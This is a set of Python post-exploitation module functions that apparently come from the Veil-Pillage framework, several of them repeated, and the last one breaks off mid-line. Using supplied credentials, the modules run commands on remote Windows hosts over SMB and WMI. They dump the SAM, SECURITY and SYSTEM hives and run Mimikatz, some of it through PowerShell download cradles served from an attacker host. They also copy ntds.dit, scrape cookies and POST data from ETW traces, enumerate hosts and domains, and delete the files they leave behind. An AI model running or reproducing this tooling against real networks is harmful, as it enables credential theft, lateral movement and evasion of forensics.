def run(self): # assume single set of credentials username, password = self.creds[0] out_file = self.required_options["out_file"][0] if "\\" not in out_file: # otherwise assume it's an absolute path out_file = "C:\\Windows\\Temp\\" + out_file for target in self.targets: # grab the output file and delete it out = smb.getFile(target, username, password, out_file, delete=True) # delete the netview.exe binary smb.deleteFile(target, username, password, "C:\\Windows\\Temp\\netview.exe") # save the file off to the appropriate location saveFile = helpers.saveModuleFile(self, target, "netview.txt", out) if out != "": self.output += "[*] netview.exe results using creds '"+username+":"+password+"' on "+target+" stored at "+saveFile+"\n" else: self.output += "[!] netview.exe execution failed using creds '"+username+":"+password+"' on "+target+" : no result file\n"
def run(self): # assume single set of credentials username, password = self.creds[0] triggerMethod = self.required_options["trigger_method"][0] # command to invoke finddllhijack and output it to a temporary file exePath = settings.VEIL_PILLAGE_PATH+"/data/misc/finddllhijack.exe" cmd = "C:\\Windows\\Temp\\finddllhijack.exe" for target in self.targets: # upload the binary to the host at C:\Windows\Temp\ smb.uploadFile(target, username, password, "C$", "\\Windows\\Temp\\", exePath) # execute finddllhijack and get the results out = command_methods.executeResult(target, username, password, cmd, triggerMethod, pause=5) # cleanup command_methods.executeCommand(target, username, password, "del C:\\Windows\\Temp\\finddllhijack.exe", triggerMethod) # save the file off to the appropriate location saveFile = helpers.saveModuleFile(self, target, "finddllhijack.txt", out) if out != "": self.output += "[*] FindDllHijack results for "+target+" stored at "+saveFile+"\n" else: self.output += "[!] FindDllHijack failed for "+target+" : no result file\n"
def run(self): # assume single set of credentials username, password = self.creds[0] triggerMethod = self.required_options["trigger_method"][0] outFile = self.required_options["out_file"][0] if "\\" not in outFile: # otherwise assume it's an absolute path outFile = "C:\\Windows\\Temp\\" + outFile for target in self.targets: targetUsernames = [] command = "echo IPCONFIG:>>%(p)s&ipconfig /all>>%(p)s&echo ARP:>>%(p)s&arp -a>>%(p)s&echo NET USERS:>>%(p)s&net users>>%(p)s&echo NET SESSIONS:>>%(p)s&net sessions>>%(p)s&echo QWINSTA:>>%(p)s&qwinsta>>%(p)s&echo NETSTAT:>>%(p)s&netstat -nao>>%(p)s&echo TASKLIST:>>%(p)s&tasklist /v>>%(p)s&echo SYSTEMINFO:>>%(p)s&systeminfo>>%(p)s" %{"p":outFile} # execute the command result = command_methods.executeCommand(target, username, password, command, triggerMethod) # wait 20 seconds for "systeminfo" to run print helpers.color("\n [*] Waiting 20 seconds for enumeration commands to run on '"+target+"'", status=True) time.sleep(20) # # grab the output file and delete it out = smb.getFile(target, username, password, outFile, delete=True) if out != "": # save the file off to the appropriate location saveFile = helpers.saveModuleFile(self, target, "enum_host.txt", out) self.output += "[*] enum_host results using creds '"+username+":"+password+"' on "+target+" stored at "+saveFile+"\n" else: self.output += "[!] enum_host failed using creds '"+username+":"+password+"' on "+target+" : no result file\n"
def run(self): # assume single set of credentials username, password = self.creds[0] out_file = self.required_options["out_file"][0] if "\\" not in out_file: # otherwise assume it's an absolute path out_file = "C:\\Windows\\Temp\\" + out_file for target in self.targets: # grab the output file and delete it out = smb.getFile(target, username, password, out_file, delete=True) # delete the netview.exe binary smb.deleteFile(target, username, password, "C:\\Windows\\Temp\\netview.exe") # save the file off to the appropriate location saveFile = helpers.saveModuleFile(self, target, "netview.txt", out) if out != "": self.output += "[*] netview.exe results using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n" else: self.output += "[!] netview.exe execution failed using creds '" + username + ":" + password + "' on " + target + " : no result file\n"
def run(self): # assume single set of credentials for this module username, password = self.creds[0] fileName = self.required_options["fileName"][0] deleteFile = self.required_options["delete"][0] for target in self.targets: print "\n [*] downloading '"+fileName+"' from "+target # check if the user wants to delete the file after download if deleteFile.lower() == "true": out = smb.getFile(target, username, password, fileName, delete=True) else: out = smb.getFile(target, username, password, fileName, delete=False) if out == "": self.output += "[!] File '"+fileName+"' from "+target+" using creds '"+username+":"+password+"' empty or doesn't exist\n" # TODO: keep this "" or change to None if nothing is returned? else: # write the module out to the appropriate output location saveName = helpers.saveModuleFile(self, target, fileName.split("\\")[-1], out) self.output += "[*] File '"+fileName+"' from "+target+" using creds '"+username+":"+password+"' saved to "+saveName+"\n"
def run(self): # assume single set of credentials for this module username, password = self.creds[0] trigger_method = self.required_options["trigger_method"][0] for target in self.targets: command = "echo %USERPROFILE%" user_profile = command_methods.executeResult(target, username, password, command, trigger_method) if user_profile == '': self.output += " [!] No result file querying env variables using creds " + username + ":" + password + " on: " + target + "\n" else: user_profile = user_profile.strip(" \r\n") recent_path1 = user_profile + "\\Recent" recent_path2 = user_profile + "\\AppData\\Roaming\\Microsoft\\Windows\\Recent" office_path1 = user_profile + "\\Application Data\\Microsoft\\Office\\Recent" office_path2 = user_profile + "\\AppData\\Roaming\\Microsoft\\Office\\Recent" self.output += " [*] Enumerating recent files on %s \n" % target for path in [recent_path1, recent_path2, office_path1, office_path2]: files = smb.ls(target, username, password, path, path_error=False) if len(files) > 0: self.output += " [*] Found %s files \n" % len(files) for file in files: if file[-3:] == "lnk": out = smb.getFile(target, username, password, path + "\\" + file, delete=False) if out == '': self.output += " [!] Failed retrieving : %s \n" % file else: save_path = helpers.saveModuleFile(self, target, file, out) self.output += " [*] .lnk file %s saved from %s to %s\n" % (file,path,save_path) try: # parsed_lnk = str(pylnk.parse(save_path)).decode('cp1252') parsed_lnk = pylnker.parse_lnk(save_path) details_path = helpers.saveModuleFile(self, target, file + '_details', parsed_lnk) self.output += " [*] .lnk file %s parsed and saved to %s\n" % (save_path,details_path) except: self.output += " [!] Error while parsing : %s \n" % save_path
def run(self): # assume single set of credentials username, password = self.creds[0] use_ssl = self.required_options["use_ssl"][0] lhost = self.required_options["lhost"][0] triggerMethod = self.required_options["trigger_method"][0] delay = self.required_options["delay"][0] out_file = self.required_options["out_file"][0] # the temporary output file gpp-password will write to if "\\" not in out_file: # otherwise assume it's an absolute path out_file = "C:\\Windows\\Temp\\" + out_file # path to the PowerSploit Invoke-Mimikatz.ps1 powershell script secondStagePath = settings.VEIL_PILLAGE_PATH + "/data/PowerSploit/Invoke-Mimikatz.ps1" # Mimikatz command to run scriptArguments = "Invoke-Mimikatz -Dumpcreds" # trigger the powershell download on all targets # ignore the architecture-independent cradle delivery_methods.powershellHostTrigger(self.targets, username, password, secondStagePath, lhost, scriptArguments, triggerMethod=triggerMethod, outFile=out_file, ssl=use_ssl, noArch=True) print "\n [*] Waiting " + delay + "s for Mimikatz to run..." time.sleep(int(delay)) for target in self.targets: # grab the output file and delete it out = smb.getFile(target, username, password, out_file, delete=True) if out != "": # save the file off to the appropriate location saveFile = helpers.saveModuleFile(self, target, "mimikatz.txt", out) self.output += "[*] Powersploit:Invoke-Mimikatz results using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n" else: self.output += "[!] Powersploit:Invoke-Mimikatz failed using creds '" + username + ":" + password + "' on " + target + " : no result file\n"
def run(self): # assume single set of credentials username, password = self.creds[0] triggerMethod = self.required_options["trigger_method"][0] flag = self.required_options["flag"][0] for target in self.targets: # stop the ETW stopCMD = "logman stop Status32 -ets" command_methods.executeCommand(target, username, password, stopCMD, triggerMethod) # search for cookies or POST paramters if flag.lower() == "post": flag = "POST" moduleFile = "post_params.txt" else: flag = "cookie added" moduleFile = "cookies.txt" # check the ETW results for the specified flag, and delete the dump file parseCmd = "wevtutil qe C:\\Windows\\Temp\\status32.etl /lf:true /f:Text | find /i \"" + flag + "\"" # wait 20 seconds for everything to parse...if errors happen, increase this parseResult = command_methods.executeResult(target, username, password, parseCmd, triggerMethod, pause=20) # delete the trace file delCmd = "del C:\\Windows\\Temp\\status32.etl" command_methods.executeCommand(target, username, password, delCmd, triggerMethod) if parseResult == "": self.output += "[!] No ETW results for " + flag + " using creds '" + username + ":" + password + "' on : " + target + "\n" else: # save the file off to the appropriate location saveFile = helpers.saveModuleFile(self, target, moduleFile, parseResult) self.output += "[*] ETW results for " + flag + " using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n"
def run(self): # assume single set of credentials username, password = self.creds[0] use_ssl = self.required_options["use_ssl"][0] lhost = self.required_options["lhost"][0] triggerMethod = self.required_options["trigger_method"][0] host_file = self.required_options["host_file"][0] # the protected file on the host to copy if host_file == "ntdis.dit": host_file = "C:\\Windows\\ntds\\ntds.dit" # Invoke-NinjaCopy -Path "c:\windows\ntds\ntds.dit" -LocalDestination "c:\windows\temp\ntds.dit" # local file to copy into localFile = "C:\\Windows\\Temp\\"+host_file.split("\\")[-1] # path to the PowerSploit Invoke-Mimikatz.ps1 powershell script secondStagePath = settings.VEIL_PILLAGE_PATH+"/data/PowerSploit/Invoke-NinjaCopy.ps1" # pass the arguments to invoke ninja-copy scriptArguments = "Invoke-NinjaCopy -Path \""+host_file+"\" -LocalDestination "+localFile # trigger the powershell download on all targets delivery_methods.powershellHostTrigger(self.targets, username, password, secondStagePath, lhost, scriptArguments, triggerMethod=triggerMethod, ssl=use_ssl) for target in self.targets: self.output += "[*] Powersploit:Invoke-NinjaCopy triggered using creds '"+username+":"+password+"' on "+target+"\n" print "\n [*] Waiting 30s for NinjaCopy to run..." time.sleep(30) for target in self.targets: # grab the output file and delete it out = smb.getFile(target, username, password, localFile, delete=False) # save the file off to the appropriate location saveFile = helpers.saveModuleFile(self, target, host_file.split("\\")[-1], out) if out != "": self.output += "[*] Powersploit:Invoke-NinjaCopy results using creds '"+username+":"+password+"' on "+target+" stored at "+saveFile+"\n" else: self.output += "[!] Powersploit:Invoke-NinjaCopy failed using creds '"+username+":"+password+"' on "+target+" : no result file\n"
def run(self): # assume single set of credentials username, password = self.creds[0] outFile = self.required_options["out_file"][0] # wmis doesn't like net * /domain commands >_< triggerMethod = "winexe" if "\\" not in outFile: # otherwise assume it's an absolute path outFile = "C:\\Windows\\Temp\\" + outFile for target in self.targets: targetUsernames = [] command = "echo NET VIEW:>>%(p)s&net view /domain>>%(p)s&echo NET USERS:>>%(p)s&net users /domain>>%(p)s&echo NET GROUPS:>>%(p)s&net groups /domain>>%(p)s&echo NET ACCOUNTS:>>%(p)s&net accounts /domain>>%(p)s" % { "p": outFile } # execute the command result = command_methods.executeCommand(target, username, password, command, triggerMethod) # wait 20 seconds for commands to run print helpers.color( "\n [*] Waiting 20 seconds for enumeration commands to run on '" + target + "'", status=True) time.sleep(20) # # grab the output file and delete it out = smb.getFile(target, username, password, outFile, delete=True) if out != "": # save the file off to the appropriate location saveFile = helpers.saveModuleFile(self, target, "enum_domain.txt", out) self.output += "[*] enum_domain results using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n" else: self.output += "[!] enum_domain failed using creds '" + username + ":" + password + "' on " + target + " : no result file\n"
def run(self): # assume single set of credentials username, password = self.creds[0] use_ssl = self.required_options["use_ssl"][0] lhost = self.required_options["lhost"][0] triggerMethod = self.required_options["trigger_method"][0] delay = self.required_options["delay"][0] out_file = self.required_options["out_file"][0] # the temporary output file gpp-password will write to if "\\" not in out_file: # otherwise assume it's an absolute path out_file = "C:\\Windows\\Temp\\" + out_file # path to the PowerSploit Invoke-Mimikatz.ps1 powershell script secondStagePath = settings.VEIL_PILLAGE_PATH+"/data/PowerSploit/Invoke-Mimikatz.ps1" # Mimikatz command to run scriptArguments = "Invoke-Mimikatz -Dumpcreds" # trigger the powershell download on all targets # ignore the architecture-independent cradle delivery_methods.powershellHostTrigger(self.targets, username, password, secondStagePath, lhost, scriptArguments, triggerMethod=triggerMethod, outFile=out_file, ssl=use_ssl, noArch=True) print "\n [*] Waiting "+delay+"s for Mimikatz to run..." time.sleep(int(delay)) for target in self.targets: # grab the output file and delete it out = smb.getFile(target, username, password, out_file, delete=True) if out != "": # save the file off to the appropriate location saveFile = helpers.saveModuleFile(self, target, "mimikatz.txt", out) self.output += "[*] Powersploit:Invoke-Mimikatz results using creds '"+username+":"+password+"' on "+target+" stored at "+saveFile+"\n" else: self.output += "[!] Powersploit:Invoke-Mimikatz failed using creds '"+username+":"+password+"' on "+target+" : no result file\n"
def run(self): # assume single set of credentials username, password = self.creds[0] triggerMethod = self.required_options["trigger_method"][0] # command to invoke finddllhijack and output it to a temporary file exePath = settings.VEIL_PILLAGE_PATH + "/data/misc/finddllhijack.exe" cmd = "C:\\Windows\\Temp\\finddllhijack.exe" for target in self.targets: # upload the binary to the host at C:\Windows\Temp\ smb.uploadFile(target, username, password, "C$", "\\Windows\\Temp\\", exePath) # execute finddllhijack and get the results out = command_methods.executeResult(target, username, password, cmd, triggerMethod, pause=5) # cleanup command_methods.executeCommand( target, username, password, "del C:\\Windows\\Temp\\finddllhijack.exe", triggerMethod) # save the file off to the appropriate location saveFile = helpers.saveModuleFile(self, target, "finddllhijack.txt", out) if out != "": self.output += "[*] FindDllHijack results for " + target + " stored at " + saveFile + "\n" else: self.output += "[!] FindDllHijack failed for " + target + " : no result file\n"
def run(self): # assume single set of credentials username, password = self.creds[0] triggerMethod = self.required_options["trigger_method"][0] flag = self.required_options["flag"][0] for target in self.targets: # stop the ETW stopCMD = "logman stop Status32 -ets" command_methods.executeCommand(target, username, password, stopCMD, triggerMethod) # search for cookies or POST paramters if flag.lower() == "post": flag = "POST" moduleFile = "post_params.txt" else: flag = "cookie added" moduleFile = "cookies.txt" # check the ETW results for the specified flag, and delete the dump file parseCmd = "wevtutil qe C:\\Windows\\Temp\\status32.etl /lf:true /f:Text | find /i \""+flag+"\"" # wait 20 seconds for everything to parse...if errors happen, increase this parseResult = command_methods.executeResult(target, username, password, parseCmd, triggerMethod, pause=20) # delete the trace file delCmd = "del C:\\Windows\\Temp\\status32.etl" command_methods.executeCommand(target, username, password, delCmd, triggerMethod) if parseResult == "": self.output += "[!] No ETW results for "+flag+" using creds '"+username+":"+password+"' on : " + target + "\n" else: # save the file off to the appropriate location saveFile = helpers.saveModuleFile(self, target, moduleFile, parseResult) self.output += "[*] ETW results for "+flag+" using creds '"+username+":"+password+"' on " + target + " stored at "+saveFile+"\n"
def run(self): # assume single set of credentials for this module username, password = self.creds[0] fileName = self.required_options["fileName"][0] deleteFile = self.required_options["delete"][0] for target in self.targets: print "\n [*] downloading '" + fileName + "' from " + target # check if the user wants to delete the file after download if deleteFile.lower() == "true": out = smb.getFile(target, username, password, fileName, delete=True) else: out = smb.getFile(target, username, password, fileName, delete=False) if out == "": self.output += "[!] File '" + fileName + "' from " + target + " using creds '" + username + ":" + password + "' empty or doesn't exist\n" # TODO: keep this "" or change to None if nothing is returned? else: # write the module out to the appropriate output location saveName = helpers.saveModuleFile(self, target, fileName.split("\\")[-1], out) self.output += "[*] File '" + fileName + "' from " + target + " using creds '" + username + ":" + password + "' saved to " + saveName + "\n"
def run(self): # assume single set of credentials username, password = self.creds[0] outFile = self.required_options["out_file"][0] # wmis doesn't like net * /domain commands >_< triggerMethod = "winexe" if "\\" not in outFile: # otherwise assume it's an absolute path outFile = "C:\\Windows\\Temp\\" + outFile for target in self.targets: targetUsernames = [] command = "echo NET VIEW:>>%(p)s&net view /domain>>%(p)s&echo NET USERS:>>%(p)s&net users /domain>>%(p)s&echo NET GROUPS:>>%(p)s&net groups /domain>>%(p)s&echo NET ACCOUNTS:>>%(p)s&net accounts /domain>>%(p)s"%{"p":outFile} # execute the command result = command_methods.executeCommand(target, username, password, command, triggerMethod) # wait 20 seconds for commands to run print helpers.color("\n [*] Waiting 20 seconds for enumeration commands to run on '"+target+"'", status=True) time.sleep(20) # # grab the output file and delete it out = smb.getFile(target, username, password, outFile, delete=True) if out != "": # save the file off to the appropriate location saveFile = helpers.saveModuleFile(self, target, "enum_domain.txt", out) self.output += "[*] enum_domain results using creds '"+username+":"+password+"' on "+target+" stored at "+saveFile+"\n" else: self.output += "[!] enum_domain failed using creds '"+username+":"+password+"' on "+target+" : no result file\n"
def run(self): # assume single set of credentials for this module username, password = self.creds[0] lhost = self.required_options["lhost"][0] use_ssl = self.required_options["use_ssl"][0] force_method = self.required_options["force_method"][0] delay = self.required_options["delay"][0] out_file = self.required_options["out_file"][0] # let's keep track of all credentials found allhashes, allmsv, allkerberos, allwdigest, alltspkg = [], [], [], [], [] for target in self.targets: powershellInstalled = False # check if we're forcing a particular grab method if force_method.lower() == "binary": powershellInstalled = False elif force_method.lower() == "powershell": powershellInstalled = True else: # check if we have a functional Powershell installation powershellCommand = 'powershell.exe -c "$a=42;$a"' powershellResult = command_methods.executeResult(target, username, password, powershellCommand, "wmis") if powershellResult.strip() == "42": powershellInstalled = True if powershellInstalled: # do powersploit combined file of invoke-mimikatz and powerdump print helpers.color("\n [*] Powershell installed on " + target) self.output += "[*] Powershell installed on " + target + ", using autograb.ps1\n" # the temporary output file we will write to if "\\" not in out_file: # otherwise assume it's an absolute path out_file = "C:\\Windows\\Temp\\" + out_file # path to the combined Invoke-Mimikatz/powerdump powershell script secondStagePath = settings.VEIL_PILLAGE_PATH + "/data/misc/autograb.ps1" # trigger the powershell download on just this target delivery_methods.powershellHostTrigger( target, username, password, secondStagePath, lhost, "", triggerMethod="winexe", outFile=out_file, ssl=use_ssl, noArch=True, ) print "\n [*] Waiting " + delay + "s for Autograb to run..." time.sleep(int(delay)) # grab the output file and delete it out = smb.getFile(target, username, password, out_file, delete=True) # save the file off to the appropriate location saveFile = helpers.saveModuleFile(self, target, "autograb.txt", out) # parse the mimikatz output and append it to our globals (msv1_0, kerberos, wdigest, tspkg) = helpers.parseMimikatz(out) allmsv.extend(msv1_0) allkerberos.extend(kerberos) allwdigest.extend(wdigest) alltspkg.extend(tspkg) # parse the powerdump component hashes = helpers.parseHashdump(out) allhashes.extend(hashes) if out != "": self.output += ( "[*] Autograb.ps1 results using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n" ) else: self.output += ( "[!] Autograb.ps1 failed using creds '" + username + ":" + password + "' on " + target + " : no result file\n" ) else: # do reg.exe for hashdump and host/execute for mimikatz print helpers.color("\n [!] Powershell not installed on " + target, warning=True) print helpers.color("\n [*] Using reg.exe save method for hash dumping on " + target) self.output += "[!] Powershell not installed on " + target + "\n" # reg.exe command to save off the hives regSaveCommand = "reg save HKLM\\SYSTEM C:\\Windows\\Temp\\system /y && reg save HKLM\\SECURITY C:\\Windows\\Temp\\security /y && reg save HKLM\\SAM C:\\Windows\\Temp\\sam /y" # execute the registry save command command_methods.executeCommand(target, username, password, regSaveCommand, "wmis") print helpers.color("\n [*] Dumping hashes on " + target) # sleep for 5 seconds to let everything backup time.sleep(5) # grab all of the backed up files systemFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\system", delete=False) securityFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\security", delete=False) samFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\sam", delete=False) # more error-checking here? if systemFile == "": self.output += "[!] File '" + systemFile + "' from " + target + " empty or doesn't exist\n" else: f = open("/tmp/system", "w") f.write(systemFile) f.close() if securityFile == "": self.output += "[!] File '" + securityFile + "' from " + target + " empty or doesn't exist\n" else: f = open("/tmp/security", "w") f.write(securityFile) f.close() if samFile == "": self.output += "[!] File '" + samFile + "' from " + target + " empty or doesn't exist\n" else: f = open("/tmp/sam", "w") f.write(samFile) f.close() # get all the hashes from these hives out = creddump.dump_file_hashes("/tmp/system", "/tmp/sam") # save the output file off saveLocation = helpers.saveModuleFile(self, target, "creddump.txt", out) self.output += ( "[*] dumped hashes (reg.exe) using creds '" + username + ":" + password + "' on " + target + " saved to " + saveLocation + "\n" ) # save these off to the universal list hashes = helpers.parseHashdump(out) allhashes.extend(hashes) # now, detect the architecture archCommand = "echo %PROCESSOR_ARCHITECTURE%" archResult = command_methods.executeResult(target, username, password, archCommand, "wmis") arch = "x86" if "64" in archResult: arch = "x64" # now time for ze mimikatz! mimikatzPath = settings.VEIL_PILLAGE_PATH + "/data/misc/mimikatz" + arch + ".exe" # the temporary output file we will write to if "\\" not in out_file: # otherwise assume it's an absolute path out_file = "C:\\Windows\\Temp\\" + out_file exeArgs = '"sekurlsa::logonPasswords full" "exit" >' + out_file # host mimikatz.exe and trigger it ONLY on this particular machine # so we can get the architecture correct delivery_methods.hostTrigger( target, username, password, mimikatzPath, lhost, triggerMethod="wmis", exeArgs=exeArgs ) print "\n [*] Waiting " + delay + "s for Mimikatz to run..." time.sleep(int(delay)) # grab the output file and delete it out = smb.getFile(target, username, password, out_file, delete=True) # parse the mimikatz output and append it to our globals (msv1_0, kerberos, wdigest, tspkg) = helpers.parseMimikatz(out) allmsv.extend(msv1_0) allkerberos.extend(kerberos) allwdigest.extend(wdigest) alltspkg.extend(tspkg) # save the file off to the appropriate location saveFile = helpers.saveModuleFile(self, target, "mimikatz.txt", out) if out != "": self.output += ( "[*] Mimikatz results using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n" ) else: self.output += ( "[!] Mimikatz failed using creds '" + username + ":" + password + "' on " + target + " : no result file\n" ) if len(allhashes) > 0: allhashes = sorted(set(allhashes)) self.output += "[*] All unique hashes:\n\t" + "\n\t".join(allhashes) + "\n" if len(allmsv) > 0: allmsv = sorted(set(allmsv)) self.output += "[*] All msv1_0:\n\t" + "\n\t".join(allmsv) + "\n" if len(allkerberos) > 0: allkerberos = sorted(set(allkerberos)) self.output += "[*] All kerberos:\n\t" + "\n\t".join(allkerberos) + "\n" if len(allwdigest) > 0: allwdigest = sorted(set(allwdigest)) self.output += "[*] All wdigest:\n\t" + "\n\t".join(allwdigest) + "\n" if len(alltspkg) > 0: alltspkg = sorted(set(alltspkg)) self.output += "[*] All tspkg:\n\t" + "\n\t".join(alltspkg) + "\n"
def run(self): # assume single set of credentials for this module username, password = self.creds[0] triggerMethod = self.required_options["trigger_method"][0] # let's keep track of ALL hashes found allHashes = "" # reg.exe command to save off the hives regSaveCommand = "reg save HKLM\\SYSTEM C:\\Windows\\Temp\\system /y && reg save HKLM\\SECURITY C:\\Windows\\Temp\\security /y && reg save HKLM\\SAM C:\\Windows\\Temp\\sam /y" for target in self.targets: print helpers.color("\n [*] Dumping hashes on " + target) # execute the registry save command command_methods.executeCommand(target, username, password, regSaveCommand, triggerMethod) # sleep for 5 seconds to let everything backup time.sleep(5) # grab all of the backed up files systemFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\system", delete=False) securityFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\security", delete=False) samFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\sam", delete=False) error = False if systemFile == "": self.output += "[!] File '" + systemFile + "' from " + target + " empty or doesn't exist\n" error = True else: f = open('/tmp/system', 'w') f.write(systemFile) f.close() if securityFile == "": self.output += "[!] File '" + securityFile + "' from " + target + " empty or doesn't exist\n" else: f = open('/tmp/security', 'w') f.write(securityFile) f.close() if samFile == "": self.output += "[!] File '" + samFile + "' from " + target + " empty or doesn't exist\n" error = True else: f = open('/tmp/sam', 'w') f.write(samFile) f.close() if not error: # get all the hashes from these hives hashes = creddump.dump_file_hashes("/tmp/system", "/tmp/sam") # add the hashes to our global list allHashes += hashes # save off the file to PILLAGE_OUTPUT_PATH/hashdump/target/hashes.txt saveLocation = helpers.saveModuleFile(self, target, "hashes.txt", hashes) self.output += "[*] dumped hashes (reg.exe) using creds '" + username + ":" + password + "' on " + target + " saved to " + saveLocation + "\n" else: self.output += "[!] Error executing hashdump using creds '" + username + ":" + password + "'on " + target + "\n" if allHashes != "": # get all non-empty hashes, uniquify and sort them allHashes = [p.lower() for p in allHashes.split("\n") if p != ''] allHashes = sorted(set(allHashes)) self.output += "[*] All unique hashes:\n" + "\n".join( allHashes) + "\n"
def run(self): # assume single set of credentials for this module username, password = self.creds[0] triggerMethod = self.required_options["trigger_method"][0] lhost = self.required_options["lhost"][0] delay = self.required_options["delay"][0] out_file = self.required_options["out_file"][0] # the temporary output file gpp-password will write to if "\\" not in out_file: # otherwise assume it's an absolute path out_file = "C:\\Windows\\Temp\\" + out_file # let's keep track of ALL plaintext credentials found allmsv, allkerberos, allwdigest, alltspkg = [], [], [], [] for target in self.targets: print "\n [*] Executing mimikatz on " + target # first, detect the architecture archCommand = "echo %PROCESSOR_ARCHITECTURE%" archResult = command_methods.executeResult(target, username, password, archCommand, triggerMethod) # if there's a failure in this initial execution, go to the next target if "error" in archResult: self.output += "[!] Mimikatz failed for " + target + " : " + archResult + "\n" continue arch = "x86" if "64" in archResult: arch = "x64" exeArgs = "\"sekurlsa::logonPasswords full\" \"exit\" >" + out_file # now time for mimikatz! mimikatzPath = settings.VEIL_PILLAGE_PATH + "/data/misc/mimikatz" + arch + ".exe" # host the arch-correct mimikatz.exe and trigger it with the appropriate arguments delivery_methods.hostTrigger(target, username, password, mimikatzPath, lhost, triggerMethod=triggerMethod, exeArgs=exeArgs) print "\n [*] Waiting " + delay + "s for Mimikatz to run..." time.sleep(int(delay)) # grab the output file and delete it out = smb.getFile(target, username, password, out_file, delete=True) # parse the mimikatz output and append it to our globals (msv1_0, kerberos, wdigest, tspkg) = helpers.parseMimikatz(out) allmsv.extend(msv1_0) allkerberos.extend(kerberos) allwdigest.extend(wdigest) alltspkg.extend(tspkg) # save the file off to the appropriate location saveFile = helpers.saveModuleFile(self, target, "mimikatz.txt", out) if out != "": self.output += "[*] Mimikatz results using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n" else: self.output += "[!] Mimikatz failed using creds '" + username + ":" + password + "' on " + target + " : no result file\n" # append the total mimikatz creds if we have any if len(allmsv) > 0: allmsv = sorted(set(allmsv)) self.output += "[*] All msv1_0:\n\t" + "\n\t".join(allmsv) + "\n" if len(allkerberos) > 0: allkerberos = sorted(set(allkerberos)) self.output += "[*] All kerberos:\n\t" + "\n\t".join( allkerberos) + "\n" if len(allwdigest) > 0: allwdigest = sorted(set(allwdigest)) self.output += "[*] All wdigest:\n\t" + "\n\t".join( allwdigest) + "\n" if len(alltspkg) > 0: alltspkg = sorted(set(alltspkg)) self.output += "[*] All tspkg:\n\t" + "\n\t".join(alltspkg) + "\n"
def run(self): # assume single set of credentials for this module username, password = self.creds[0] triggerMethod = self.required_options["trigger_method"][0] # let's keep track of ALL hashes found allHashes = "" # reg.exe command to save off the hives regSaveCommand = "reg save HKLM\\SYSTEM C:\\Windows\\Temp\\system /y && reg save HKLM\\SECURITY C:\\Windows\\Temp\\security /y && reg save HKLM\\SAM C:\\Windows\\Temp\\sam /y" for target in self.targets: print helpers.color("\n [*] Dumping hashes on " + target) # execute the registry save command command_methods.executeCommand(target, username, password, regSaveCommand, triggerMethod) # sleep for 5 seconds to let everything backup time.sleep(5) # grab all of the backed up files systemFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\system", delete=False) securityFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\security", delete=False) samFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\sam", delete=False) error = False if systemFile == "": self.output += "[!] File '" + systemFile + "' from " + target + " empty or doesn't exist\n" error = True else: f = open("/tmp/system", "w") f.write(systemFile) f.close() if securityFile == "": self.output += "[!] File '" + securityFile + "' from " + target + " empty or doesn't exist\n" else: f = open("/tmp/security", "w") f.write(securityFile) f.close() if samFile == "": self.output += "[!] File '" + samFile + "' from " + target + " empty or doesn't exist\n" error = True else: f = open("/tmp/sam", "w") f.write(samFile) f.close() if not error: # get all the hashes from these hives hashes = creddump.dump_file_hashes("/tmp/system", "/tmp/sam") # add the hashes to our global list allHashes += hashes # save off the file to PILLAGE_OUTPUT_PATH/hashdump/target/hashes.txt saveLocation = helpers.saveModuleFile(self, target, "hashes.txt", hashes) self.output += ( "[*] dumped hashes (reg.exe) using creds '" + username + ":" + password + "' on " + target + " saved to " + saveLocation + "\n" ) else: self.output += ( "[!] Error executing hashdump using creds '" + username + ":" + password + "'on " + target + "\n" ) if allHashes != "": # get all non-empty hashes, uniquify and sort them allHashes = [p.lower() for p in allHashes.split("\n") if p != ""] allHashes = sorted(set(allHashes)) self.output += "[*] All unique hashes:\n" + "\n".join(allHashes) + "\n"
def run(self): # assume single set of credentials for this module username, password = self.creds[0] lhost = self.required_options["lhost"][0] use_ssl = self.required_options["use_ssl"][0] force_method = self.required_options["force_method"][0] delay = self.required_options["delay"][0] out_file = self.required_options["out_file"][0] # let's keep track of all credentials found allhashes, allmsv, allkerberos, allwdigest, alltspkg = [], [], [], [], [] for target in self.targets: powershellInstalled = False # check if we're forcing a particular grab method if force_method.lower() == "binary": powershellInstalled = False elif force_method.lower() == "powershell": powershellInstalled = True else: # check if we have a functional Powershell installation powershellCommand = "powershell.exe -c \"$a=42;$a\"" powershellResult = command_methods.executeResult( target, username, password, powershellCommand, "wmis") if powershellResult.strip() == "42": powershellInstalled = True if powershellInstalled: # do powersploit combined file of invoke-mimikatz and powerdump print helpers.color("\n [*] Powershell installed on " + target) self.output += "[*] Powershell installed on " + target + ", using autograb.ps1\n" # the temporary output file we will write to if "\\" not in out_file: # otherwise assume it's an absolute path out_file = "C:\\Windows\\Temp\\" + out_file # path to the combined Invoke-Mimikatz/powerdump powershell script secondStagePath = settings.VEIL_PILLAGE_PATH + "/data/misc/autograb.ps1" # trigger the powershell download on just this target delivery_methods.powershellHostTrigger(target, username, password, secondStagePath, lhost, "", triggerMethod="winexe", outFile=out_file, ssl=use_ssl, noArch=True) print "\n [*] Waiting " + delay + "s for Autograb to run..." time.sleep(int(delay)) # grab the output file and delete it out = smb.getFile(target, username, password, out_file, delete=True) # save the file off to the appropriate location saveFile = helpers.saveModuleFile(self, target, "autograb.txt", out) # parse the mimikatz output and append it to our globals (msv1_0, kerberos, wdigest, tspkg) = helpers.parseMimikatz(out) allmsv.extend(msv1_0) allkerberos.extend(kerberos) allwdigest.extend(wdigest) alltspkg.extend(tspkg) # parse the powerdump component hashes = helpers.parseHashdump(out) allhashes.extend(hashes) if out != "": self.output += "[*] Autograb.ps1 results using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n" else: 